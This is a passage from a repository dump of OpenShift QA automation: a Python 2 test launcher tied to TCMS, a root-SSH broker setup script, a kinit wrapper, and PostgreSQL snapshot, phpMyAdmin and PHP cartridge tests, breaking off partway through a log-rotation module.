manually, because of e.g. long execution \n #time or requires some user interaction, we will mark this case as \n #PAUSED and it will be up to user to accomplish such task\n #https://hosted.englab.nay.redhat.com/issues/10569\n if manual_run_tag_id in tc['tag']:\n tcmsobj.update_testcaserun_status(tc['case_run_id'], 'PAUSED')\n continue\n to_skip = False\n for stag in skip_tag_ids:\n if stag in tc['tag']:\n to_skip = True\n break\n if to_skip:\n #tcmsobj.update_testcaserun_comments(tc['case_run_id'], 'SKIPPED/IGNORED by launcher.py --skip_tags ... 
or has \"need_update_auto\" tag')\n tcmsobj.update_testcaserun_status(tc['case_run_id'], 'WAIVED')\n continue\n\n tcmsobj.update_testcaserun_status(tc['case_run_id'], 'RUNNING')\n write_file(cf_path, content)\n exec_testmodule(module_name, tc, testrun_id)\n else:\n log.debug(\"Testcaserun - %s status is not IDLE now, skip it.\" %(tc['case_run_id']))\n else:\n ## user running w/o TCMS should always be creating new entry into DB and not reuse\n for tc in final_testrun_cases:\n debug(\"\\n\\n\")\n debug(\"-\" * 80)\n log.info(\"Running case#%s [%s...]\" %(tc['case_id'], tc['summary'][:40]))\n debug(\"-\" * 80)\n try:\n json_data = json.loads(tc['script'])\n script = json_data['python'].strip().split(\".py\")[0]\n except:\n print \"Can't find script...trying again with .py format\"\n script = tc['script'].strip().split(\".py\")[0]\n\n cf_path = \"%s/%s.%s\" %(testmodules_path, script + \".conf\", OshiftUser)\n module_name = \".\".join(script.split(\"/\"))\n if len(script.strip()) == 0 or len(module_name) == 0:\n log.info(\"WARNING: Undefined script in TCMS\")\n continue\n if tc['arguments'] == '':\n tc['arguments'] = None\n\n content = \"\"\"\ntcms_arguments = %s\nscript = '%s'\nmysql_db_testrun_id = '%s'\ntcms_testcase_id = %s\ntcms_testrun_environment = '%s' \n\"\"\" %(tc['arguments'], tc['script'], testrun_id, tc['case_id'], '___TBD___')\n # udpate testcase_run table\n caserun_res = database.update_testcaserun_status(testrun_id, tc['case_id'], 'RUNNING')\n write_file(cf_path, content)\n exec_testmodule(module_name, testrun_id)\n test_res = database.get_latest_test_result()\n if test_res.PassFail =='P':\n caserun_res = database.update_testcaserun_status(testrun_id, tc['case_id'], 'PASSED')\n elif test_res.PassFail =='F':\n caserun_res = database.update_testcaserun_status(testrun_id, tc['case_id'], 'FAILED')\n #caserun_res.status = test_case_status \n print caserun_res[0]\n \n # XXX put this back later. \n # In the end, will run 146352\n debug(\"=\" * 80)\n log.debug(\"Job ends - Cleaning domain and app\")\n debug(\"=\" * 80)\n exec_testmodule(\"RT.job_related.apps_clean_up\", rhtest_args=' -R -G ')\n if not FROM_DB:\n # Update the test run status to FINISHED \n tcmsobj.update_testrun(testrun_id, {'status' : 1})\n else:\n # udpate the mysqld db for the testrun_tag\n database.update_testrun(testrun_id, {'status' :1})\n\n\ndef exec_testmodule(testname, tc_obj=None, testrun_id=None, rhtest_args=''):\n if tc_obj:\n tcms_run_details = \"\"\n case_run_id = tc_obj['case_run_id']\n case_id = tc_obj['case_id']\n tcms_run_details = \",\".join([str(testrun_id), str(case_run_id), str(case_id)])\n else:\n case_run_id = None\n tcms_run_details = None\n\n instance_ip = get_instance_ip()\n log_file = \"%s/curr_tc_log.%s\"%(get_tmp_dir(), case_run_id)\n if os.getenv('RHTEST_ARGS'):\n rhtest_args += \" \"+os.getenv('RHTEST_ARGS')+\" \"\n if DEBUG:\n rhtest_args += \" -d \"\n shell_options=\"\"\n if os.getenv(\"SHELL\") == \"/bin/bash\":\n if platform.dist()[0] == 'Ubuntu':\n shell_options = \" bash -c 'set -o pipefail';\"\n else:\n shell_options = \" set -o pipefail;\"\n else:\n log.warning(\"Non BASH shell(%s). 
If possible use /bin/bash instead.\"%os.getenv(\"SHELL\"))\n prev_dir = os.getcwd()\n os.chdir(RUNDIR)\n cmd = \"%s %s/rhtest -i %s -x %s %s %s 2>&1 | tee %s 2>&1;\"%(shell_options,\n file_path, \n instance_ip,\n tcms_run_details,\n rhtest_args,\n testname,\n log_file)\n log.debug(cmd)\n print \"CMD: %s\" % cmd\n try:\n ret = os.system(cmd)\n finally:\n os.chdir(prev_dir)\n #this is strange (probably because of pipefail)\n if (ret>255):\n ret = ret/256\n\n return ret\n\n\ndef create_test_run(testrun_tag, tc_id_list, testplan_id):\n \"\"\"\n Create TCMS.TestRun according to tc_id_list.\n \"\"\"\n timestamp = time.strftime(\"%Y_%m_%d-%H:%M:%S\", time.localtime())\n test_run_summary = \"%s [%s]\" %(testrun_tag, timestamp)\n testrun_id = tcmsobj.create_testrun(test_run_summary, plan_id=testplan_id)['run_id']\n # create_domain - 142463; clean_up - 146352\n # This two cases must be added into new test run as the first one, and the last one.\n #update_test_run(testrun_id, [142463])\n update_test_run(testrun_id, tc_id_list) \n #update_test_run(testrun_id, [146352])\n return testrun_id\n \n\ndef update_test_run(testrun_id, tc_id_list):\n \"\"\"\n Update TCMS.TestRun according to tc_id_list.\n \"\"\"\n if tc_id_list != None and isinstance(tc_id_list, list) and len(tc_id_list) != 0:\n tcmsobj.add_testcase_to_run(tc_id_list, testrun_id)\n return True\n else:\n print \"only support list format for test cases\"\n return False\n \ndef parse_cmdline():\n usage = \"\"\"\nusage: %s {Instance Arguments} {TCMS Arguments}\nInstance Arguments: (-a ec2-xxx.compute-1.amazonaws.com) | ([-m devenv_xxx] [-n QE_devenv_xxx] [-z xxx])\nTCMS Arguments: (-t xxx (-c 'n, ..., m')|(-g 'xxx, ..., zzz') [-p xxx]) | (-i xxx [(-c 'n, ..., m')|(-g 'xxx, ..., zzz') -p xxx])\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.set_defaults(FROM_DB=False)\n parser.add_option(\"-d\", \"--debug\", dest=\"DEBUG\", action='store_true', help=\"Enable debug information\")\n parser.add_option(\"-m\", \"--ami\", dest=\"ami\", help=\"Instance Arguments: Launch openshift instance from this ami.\")\n parser.add_option(\"-n\", \"--instance_tag\", dest=\"instance_tag\", help=\"Instance Arguments: Instance tag for the newly launched instance\")\n parser.add_option(\"-a\", \"--instance_ip\", dest=\"instance_ip\", help=\"Instance Arguments: Using this exsiting openshift instance for testing\")\n parser.add_option(\"-A\", \"--instance_ip_by_tag\", dest=\"instance_ip_by_tag\", help=\"Instance Arguments: Using this existing openshift instance for testing defined by tag.\")\n parser.add_option(\"-z\", \"--image_size\", dest=\"image_size\", default='m1.medium', help=\"Instance Arguments: Specify size for launching instance. 
By default it is m1.medium\")\n parser.add_option(\"-t\", \"--testrun_tag\", dest=\"testrun_tag\", help=\"TCMS Arguments: Create new test run with this tag\")\n parser.add_option(\"-i\", \"--testrun_id\", dest=\"testrun_id\", type=int, help=\"TCMS Arguments: Using this existing test run that you want to run.\")\n parser.add_option(\"-c\", \"--testcase_ids\", dest=\"testcase_ids\", help=\"TCMS Arguments: A list of test case ids that you want to execute\")\n parser.add_option(\"-g\", \"--testcase_tags\", dest=\"testcase_tags\", help=\"TCMS Arguments: A list of test case tags that you want to execute\")\n parser.add_option(\"-p\", \"--testplan_id\", dest=\"testplan_id\", default=4962, type=int, help=\"TCMS Arguments: All test cases are selected from this test plan for creating/updating test run. By default it is 4962 - https://tcms.engineering.redhat.com/plan/4962/\")\n parser.add_option(\"-s\", \"--skip_tags\", dest=\"skip_tags\", help=\"TCMS Arguments: A list of test case tags that you want to skip\")\n parser.add_option(\"-r\", \"--client_version\", dest=\"client_version\", help=\"Arguments: version number of rhc client to use. If not defined, it will be used the last one\")\n parser.add_option(\"-D\", action=\"store_true\", dest=\"FROM_DB\", help=\"retrieve the testcase and tag information from MySQL database\")\n\n return parser.parse_args()\n\n\ndef main():\n global tcmsobj\n global DEBUG\n\n (options, args) = parse_cmdline()\n\n try:\n os.makedirs(get_tmp_dir())\n #TODO: what about remove whole TMP_DIR?\n # it seems to be safe if it is within $HOME/tmp/\n except:\n pass\n \n shutil.rmtree(RUNDIR, True)\n os.makedirs(RUNDIR)\n try:\n # Remove OSConf cache\n os.remove(OSConf.get_cache_file())\n os.remove(\"%s/libra_server-%s\"%(get_tmp_dir(), OshiftUser))\n except:\n pass\n '''\n if options.client_version:\n log.info(\"Setup rhc client to version: %s\"%options.client_version)\n try:\n r = setup_rhc_client(options.client_version)\n #r = update_rhc_client(options.client_version)\n if r != 0:\n raise Exception(\"\")\n except:\n log.error(\"Unable to setup RHC client to given version!\")\n sys.exit(254)\n '''\n DEBUG = options.DEBUG\n if DEBUG:\n os.environ['RHTEST_DEBUG'] = '1'\n # Priority for Instance Arguments: -a -> -m\n if options.instance_ip != None:\n # This branch is when you want to use existing instance\n instance_ip = options.instance_ip\n elif options.instance_ip_by_tag is not None:\n # This branch is when you want to use previously \n # launched/stopped instance\n try:\n if not options.instance_ip_by_tag.startswith('QE_'):\n log.warning(\"Appending QE_ prefix for given instance tag!\")\n options.instance_ip_by_tag = 'QE_'+options.instance_ip_by_tag\n instance_ip = get_instance_ip_by_tag(options.instance_ip_by_tag)\n log.info(\"Found instance[%s] IP=%s\"%(options.instance_ip_by_tag, instance_ip))\n except Exception as e:\n log.warning(\"Unable to get IP address from instance by tag: %s. (%s)\"%\n (options.instance_ip_by_tag, str(e)))\n log.warning(\"Instance doesn't exist!\")\n log.warning(\"Therefoer a new instance is going to be launched.\")\n try:\n instance_ip = create_node(options.instance_ip_by_tag, options.ami, options.image_size)\n except Exception as e:\n log.error(\"Unable to launch new instance with tag:%s. 
(%s)\"%\n (options.instance_ip_by_tag, str(e)))\n sys.exit(254)\n else:\n # This is when you want to launch new instance\n instance_ip = create_node(options.instance_tag, options.ami, options.image_size)\n\n testplan_id = options.testplan_id\n os.environ['OPENSHIFT_libra_server'] = instance_ip\n \n set_libra_server(instance_ip)\n #log.info(\"Platform: %s\"%\" \".join(platform.uname()))\n #log.info(cmd_get_status_output(\"rhc --version; python --version; ruby --version\", quiet=True)[1])\n #log.info(aws_console.get_ami(get_instance_ip()))\n #try:\n # log.info(\"Host: %s\"%socket.gethostbyname(socket.gethostname()))\n #except:\n # log.info(\"Host: %s\"%socket.gethostname())\n #Do TCMS authentication only once\n\n tc_id_list = []\n tc_tag_list = []\n skip_tag_ids = []\n\n if not options.FROM_DB:\n tcmsobj = TCMS()\n else:\n global FROM_DB\n FROM_DB = options.FROM_DB\n\n if options.testcase_ids != None:\n tmp_list = options.testcase_ids.split(',')\n for i in tmp_list:\n tc_id_list.append(int(i.strip()))\n elif options.testcase_tags != None:\n tmp_list = options.testcase_tags.split(',')\n for i in tmp_list:\n tc_tag_list.append(i.strip())\n #print \"--->\", tc_tag_list\n\n # remove need_update_auto tag\n if options.skip_tags:\n options.skip_tags = \"xxx,%s\"%(options.skip_tags)\n else:\n options.skip_tags = \"xxx\"\n tags_to_skip = map(lambda x: x.strip(),options.skip_tags.split(','))\n log.debug(\"TAGS to skip:%s\"%tags_to_skip)\n skip_tag_ids = tcmsobj.get_tag_id(tags_to_skip)\n\n\n # Priority for TCMS Arguments: -i -> -t\n # Priority for test case filter arguments: -c -> -g\n if options.testrun_id != None:\n # This branch is when you want to use existing test run\n test_run_id = options.testrun_id\n if not options.FROM_DB:\n log.info(\"Using existing TCMS Test Run - https://tcms.engineering.redhat.com/run/%s/\" %(test_run_id))\n else:\n log.info(\"Not talking with TCMS...using MySQL db instead...\")\n \n if len(tc_id_list) != 0:\n r = run_tests(test_run_id, tc_id_list, skip_tag_ids=skip_tag_ids)\n elif len(tc_tag_list) != 0:\n if not options.FROM_DB:\n tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list, testplan_id)\n else:\n params = {'is_automated': 1, 'case_status': 'CONFIRMED'}\n tc_id_list = database.get_testcase_ids_by_tag(tc_tag_list, params)\n r = run_tests(test_run_id, tc_id_list, skip_tag_ids=skip_tag_ids)\n else:\n r = run_tests(test_run_id, skip_tag_ids=skip_tag_ids)\n elif options.testrun_tag != None:\n # This branch is when you want to create a new test run\n if len(tc_id_list) != 0:\n test_run_id = create_test_run(options.testrun_tag, tc_id_list, testplan_id)\n r = run_tests(test_run_id, skip_tag_ids=skip_tag_ids)\n elif len(tc_tag_list) != 0:\n if options.FROM_DB:\n # get tc_id_list from DB\n params = {'is_automated': 1, 'case_status': 'CONFIRMED'}\n # 1. create a testrun into row mysql db\n testrun_res = database.create_tcms_testrun()\n # 2. get test list from db\n tc_id_list = database.get_testcase_ids_by_tag(tc_tag_list, params)\n # 3. create testcase_run entries into db_res\n tc_run_id_list = []\n for tc_id in tc_id_list:\n params = {'run': testrun_res.id, 'case_id': tc_id }\n res = database.create_tcms_testcase_run(params)\n tc_run_id_list.append(res.id) \n\n # 4. 
update test_run db entry with the testcase list\n test_run_id = testrun_res.id \n testrun_res.case_list = str(tc_run_id_list)\n else:\n tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list, testplan_id)\n test_run_id = create_test_run(options.testrun_tag, tc_id_list, testplan_id)\n r = run_tests(test_run_id, tc_id_list, skip_tag_ids=skip_tag_ids)\n else:\n print usage\n raise Exception(\"Entry test case id list using option '-c' or test case tag list using option '-g'\")\n else:\n print usage\n raise Exception(\"Enter existing TCMS test run id using option '-i' or create new TCMS test run using option '-t'\")\n\n # Clean up everything under workspace/\n # we don't wanna clean it, because of later debugging \n #os.system(\"rm -rf %s/../workspace/*\" % (file_path))\n\n return r\n\n\ndef debug(msg):\n print >> sys.stderr, msg\n\nif __name__ == \"__main__\":\n exit_code=main()\n sys.exit(exit_code)\n" }, { "alpha_fraction": 0.5449438095092773, "alphanum_fraction": 0.5786516666412354, "avg_line_length": 16.799999237060547, "blob_id": "e73a3b731abf043ac52950fac7e4e2fd153f21e6", "content_id": "4ced89a8e6d4e510f55a22f6ea207d5d6d8935ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 178, "license_type": "no_license", "max_line_length": 73, "num_lines": 10, "path": "/automation/open/testmodules/RT/cartridge/app_template/php_pear.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n\ninclude \"Validate.php\";\n\nif (Validate::number(8.0004, array('decimal' => '.', 'dec_prec' => 4))) {\n echo 'get_correct_number';\n} else {\n echo \"Invalid number\";\n}\n?>\n" }, { "alpha_fraction": 0.6676557660102844, "alphanum_fraction": 0.6706231236457825, "avg_line_length": 24.923076629638672, "blob_id": "4bea3a6a5ba6790312fca9a50f4ff652d9757a5c", "content_id": "bbe506cfefdbe01a73cb1f40f1c76d463bb74f1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 337, "license_type": "no_license", "max_line_length": 63, "num_lines": 13, "path": "/automation/open/bin/kinit.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n#\n# Variables below might be obtained from Jenkins job parameters\n#\nif [ -f $RHTEST_HOME/bin/kinit.expect ]; then\n $RHTEST_HOME/bin/kinit.expect \"$TCMS_USER\" \"$TCMS_PASSWORD\"\nelif [ -f ./kinit.expect ]; then \n ./kinit.expect \"$TCMS_USER\" \"$TCMS_PASSWORD\"\nelse\n echo \"Unable to find 'kinit.expect' file\"\n exit 3\nfi\n" }, { "alpha_fraction": 0.6913357377052307, "alphanum_fraction": 0.7129963636398315, "avg_line_length": 19.518518447875977, "blob_id": "c8b38e8cfaeeb6a129a6709f9a0460b5a2f1e319", "content_id": "d7230dc7b45a36c7b15627a9a31ea74e28b65bc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 554, "license_type": "no_license", "max_line_length": 67, "num_lines": 27, "path": "/automation/open/bin/setup_cloud9_env.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n#\n# Generated from https://hosted.englab.nay.redhat.com/issues/11904\n#\n# [email protected]\n#\n\nset -e\n\nif [ -z \"$2\" ]; then\n echo \"Usage: $0 <Broker IP> <Openshift login>\"\n exit 2\nfi\n\nBROKER=$1\nLOGIN=$2\n\nssh root@$BROKER<<EOF\ncd /etc/openshift\nrm -f resource_limits.conf\nln -s resource_limits.conf.c9 resource_limits.conf\n/usr/libexec/mcollective/update_yaml.rb /etc/mcollective/facts.yaml\nrhc-admin-ctl-user -l $LOGIN 
--allowsubaccounts true\nrhc-admin-ctl-user -l $LOGIN --addgearsize c9\nrhc-admin-ctl-user -l $LOGIN --inheritgearsize true\nEOF\n" }, { "alpha_fraction": 0.5008310079574585, "alphanum_fraction": 0.5098799467086792, "avg_line_length": 40.33587646484375, "blob_id": "cdc75bddad6feda4fd9d42fb33d4f67c2038a2b7", "content_id": "5c55a1e1243d76fe196fc910748c0f7dc597e6ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5415, "license_type": "no_license", "max_line_length": 204, "num_lines": 131, "path": "/automation/open/testmodules/RT/cartridge/postgresql_snapshot_existing_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nJun 25, 2012\n\n[US1386][Runtime][cartridge]Snapshot and restore PostgreSQL data to existing app\nhttps://tcms.engineering.redhat.com/case/128840/\n\"\"\"\n\nimport os\nimport rhtest\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing self.config.test_variant, using `php` as default\")\n self.test_variant='jbossews'\n\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(7)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n common.env_setup()\n self.summary = \"[US1386][Runtime][cartridge]Snapshot and restore PostgreSQL data to existing app\"\n \n\n def finalize(self):\n #Removing snapshot file\n os.remove(\"./\" + self.app_name + \".tar.gz\")\n \n def run_sql(self, sql_commands = []):\n command = 'echo \"%s\" | psql -F, -t -A \"dbname=%s host=%s user=%s password=%s port=%s\"' % (\n \";\\n\".join(sql_commands),\n self.sql_credentials[\"database\"],\n self.sql_credentials[\"url\"],\n self.sql_credentials[\"username\"],\n self.sql_credentials[\"password\"],\n self.sql_credentials[\"port\"] \n )\n return common.run_remote_cmd(self.app_name, command)\n\nclass PostgresqlSnapshotExistingApp(OpenShiftTest):\n \n def test_method(self):\n self.info(\"=================================\")\n self.info(\"1. Create an application\")\n self.info(\"=================================\")\n if self.scalable:\n ret = common.create_scalable_app(self.app_name,\n self.app_type,\n clone_repo = True,\n disable_autoscaling=True)\n else:\n ret = common.create_app(self.app_name,\n self.app_type,\n clone_repo = True)\n self.assert_equal(0, ret, \"Error creating app.\")\n \n self.info(\"=================================\")\n self.info(\"2. Embed PostgreSQL\")\n self.info(\"=================================\")\n common.embed(self.app_name, \"add-\" + common.cartridge_types[\"postgresql\"])\n #\n # Reading PostgreSQL credentials from local cache\n #\n user = OSConf.OSConf()\n user.load_conf()\n\t\n #self.sql_credentials = user.conf[\"apps\"][self.app_name]['embed'][common.cartridge_types[\"postgresql\"]]\n #print user.conf[\"apps\"][self.app_name]['embed']\n self.sql_credentials = user.conf[\"apps\"][self.app_name]['embed'][\"postgresql-8.4\"]\n\t\n self.info(\"=================================\")\n self.info(\"3. 
Write data into PostgreSQL\")\n        self.info(\"=================================\")\n        sql_commands = [\n            \"DROP TABLE IF EXISTS testing\",\n            \"CREATE TABLE testing ( text VARCHAR(50) )\"\n        ]\n        for i in range(0, 10):\n            sql_commands.append(\"INSERT INTO testing VALUES ( '%s' )\" % common.getRandomString())\n        self.assert_true(self.run_sql(sql_commands)[0] == 0)\n        \n        self.info(\"=================================\")\n        self.info(\"4. Create snapshot\")\n        self.info(\"=================================\")\n        common.command_getstatusoutput(\"rhc snapshot save %s -l %s -p '%s' %s\" % ( self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n        \n        self.info(\"=================================\")\n        self.info(\"5. Write additional data into PostgreSQL\")\n        self.info(\"=================================\")\n        sql_commands = []\n        for i in range(0, 10):\n            sql_commands.append(\"INSERT INTO testing VALUES ( '%s' )\" % common.getRandomString())\n        self.assert_true(self.run_sql(sql_commands)[0] == 0)\n        \n        self.info(\"=================================\")\n        self.info(\"6. Restore from snapshot\")\n        self.info(\"=================================\")\n        common.command_getstatusoutput(\"rhc snapshot restore %s -l %s -p '%s' %s\" % ( self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n        \n        self.info(\"=================================\")\n        self.info(\"7. Ensure that data is restored\")\n        self.info(\"=================================\")\n        # It means that there should be only 10 rows in the database\n        ( ret_code, ret_output ) = self.run_sql([\"SELECT 'Number of records', count(*) FROM testing\"])\n        self.assert_true(ret_output.find(\"Number of records,10\") != -1)\n        \n        return self.passed(self.summary)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(PostgresqlSnapshotExistingApp)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.6504442095756531, "alphanum_fraction": 0.6595210433006287, "avg_line_length": 52.9375, "blob_id": "4114f0bd5174fd78d80344e59339a6ce0ce7359e", "content_id": "547aaaa28e1833cf44d6c2f2c17ef6c3148bd412", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5178, "license_type": "no_license", "max_line_length": 162, "num_lines": 96, "path": "/automation/open/testmodules/RT/cartridge/mysql_admin_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-23\n\n[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\nhttps://tcms.engineering.redhat.com/case/138803/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False # define to True if your test is interactive (takes user input).\n    ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n\n    def initialize(self):\n        try:\n            self.test_variant = self.get_variant()\n        except:\n            self.info(\"WARN: Missing variant, used `php` as default\")\n            self.test_variant = 'php'\n        self.summary = \"[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\"\n        self.app_name = \"mysqladmin\" + common.getRandomString(4)\n        self.app_type = common.app_types[self.test_variant]\n        self.git_repo = \"./%s\" % (self.app_name)\n        common.env_setup()\n\n    def finalize(self):\n        pass\n\n\nclass 
MysqlAdminTest(OpenShiftTest):\n\n def test_method(self):\n # Create app\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"App creation failed\")\n # Try to embed phpmyadmin without mysql embedded\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"phpmyadmin\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_not_equal(ret, 0, \"phpmyadmin shouldn't be embedded before embedding mysql\")\n # Embed mysql to it\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to the app\")\n # Embed phpmyadmin to it\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"phpmyadmin\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed MySQL Admin(phpmyadmin) to the app\")\n # Check phpmyadmin is working properly\n mysql_username = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]]['username']\n mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]]['password']\n phpadmin_url = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"phpmyadmin\"]]['url']\n expected_output = \"phpMyAdmin is more friendly with a <b>frames-capable</b> browser\"\n ret = common.grep_web_page(phpadmin_url, common.raw_str(expected_output), \"-k -H 'Pragma: no-cache' -L -u '%s:%s'\" % (mysql_username, mysql_passwd), 5, 4)\n self.assert_equal(ret, 0, \"phpmyadmin isn't working properly\")\n # Remove embedded mysql from the app\n ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to remove embedded mysql from the app\")\n # Check phpmyadmin isn't removed\n time.sleep(5)\n cmd = \"curl -k -H 'Pragma: no-cache' -L -u '%s:%s' %s\" % (mysql_username, mysql_passwd, phpadmin_url)\n (ret, output) = common.command_getstatusoutput(cmd, quiet=True)\n self.assert_not_match(\"404 Not Found\", output, \"Found '404 Not Found'. 
phpmyadmin shouldn't be removed\")\n # Check mysql database is inaccessable\n expected_outputs = [common.raw_str(\"phpMyAdmin - Error\"),\n common.raw_str(\"#2003 - Can't connect to MySQL server on\"),\n common.raw_str(\"The server is not responding\")]\n ret = common.grep_web_page(phpadmin_url, expected_outputs, \"-k -H 'Pragma: no-cache' -L -u '%s:%s'\" % (mysql_username, mysql_passwd), 5, 4, True)\n self.assert_equal(ret, 0, \"phpmyadmin shouldn't be working!!!\")\n # Re-embed mysql to the app\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to re-embed mysql\")\n # Check phpmyadmin is working properly again\n mysql_username = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]]['username']\n mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]]['password']\n expected_output = \"phpMyAdmin is more friendly with a <b>frames-capable</b> browser\"\n ret = common.grep_web_page(phpadmin_url, common.raw_str(expected_output), \"-k -H 'Pragma: no-cache' -L -u '%s:%s'\" % (mysql_username, mysql_passwd), 5, 4)\n self.assert_equal(ret, 0, \"phpmyadmin isn't working properly after re-embedding mysql\")\n # The end\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MysqlAdminTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6541768908500671, "alphanum_fraction": 0.6701474189758301, "avg_line_length": 22.919116973876953, "blob_id": "959cc0cf75a48163071a9102811999cf2dbc5288", "content_id": "08150570e31fe2aeb8251fae1a5b4e13340360cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3256, "license_type": "no_license", "max_line_length": 100, "num_lines": 136, "path": "/automation/open/lib/logfile.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nManaging logfile rotation. A ManagedLog object is a file-like object that\nrotates itself when a maximum size is reached.\n\n\"\"\"\nimport sys, os\n\nclass SizeError(IOError):\n\tpass\n\nclass LogFile(file):\n\t\"\"\"LogFile(name, [mode=\"w\"], [maxsize=360000])\n\tOpens a new file object. After writing <maxsize> bytes a SizeError will be\n\traised. \"\"\"\n\tdef __init__(self, name, mode=\"w\", maxsize=360000):\n\t\tsuper(LogFile, self).__init__(name, mode)\n\t\tself.maxsize = maxsize\n\t\tself.written = 0\n\n\tdef write(self, data):\n\t\tself.written += len(data)\n\t\tsuper(LogFile, self).write(data)\n\t\tself.flush()\n\t\tif self.written > self.maxsize:\n\t\t\traise SizeError\n\n\tdef rotate(self):\n\t\treturn rotate(self)\n\n\tdef note(self, text):\n\t\t\"\"\"Writes a specially formated note text to the file.The note starts\nwith the string '\\\\n#*=' so you can easily filter them. \"\"\"\n\t\tself.write(\"\\n#*===== %s =====\\n\" % (text,))\n\n\nclass ManagedLog(object):\n\t\"\"\"ManagedLog(name, [maxsize=360000], [maxsave=9])\n\tA ManagedLog instance is a persistent log object. Write data with the\n\twrite() method. 
The log size and rotation is handled automatically.\n\n\t\"\"\"\n\tdef __init__(self, name, maxsize=360000, maxsave=9):\n\t\tif os.path.isfile(name):\n\t\t\tshiftlogs(name, maxsave)\n\t\tself._lf = LogFile(name, \"w\", maxsize)\n\t\tself.maxsave = maxsave\n\n\tdef __repr__(self):\n\t\treturn \"%s(%r, %r, %r)\" % (self.__class__.__name__, self._lf.name, self._lf.maxsize, self.maxsave)\n\n\tdef write(self, data):\n\t\ttry:\n\t\t\tself._lf.write(data)\n\t\texcept SizeError:\n\t\t\tself._lf = rotate(self._lf, self.maxsave)\n\t\n\tdef written(self):\n\t\treturn self._lf.written\n\n\tdef rotate(self): \n\t\tself._lf = rotate(self._lf, self.maxsave)\n\t\n\t# auto-delegate remaining methods (but you should not read or seek an open\n\t# log file).\n\tdef __getattr__(self, name):\n\t\treturn getattr(self._lf, name)\n\n\n# useful for logged stdout for daemon processes\nclass ManagedStdio(ManagedLog):\n\tdef write(self, data):\n\t\ttry:\n\t\t\tself._lf.write(data)\n\t\texcept SizeError:\n\t\t\tsys.stdout.flush()\n\t\t\tsys.stderr.flush()\n\t\t\tself._lf = rotate(self._lf, self.maxsave)\n\t\t\tfd = self._lf.fileno()\n\t\t\tos.dup2(fd, 1)\n\t\t\tos.dup2(fd, 2)\n\t\t\tsys.stdout = sys.stderr = self\n\n\ndef rotate(fileobj, maxsave=9):\n\tname = fileobj.name\n\tmode = fileobj.mode\n\tmaxsize = 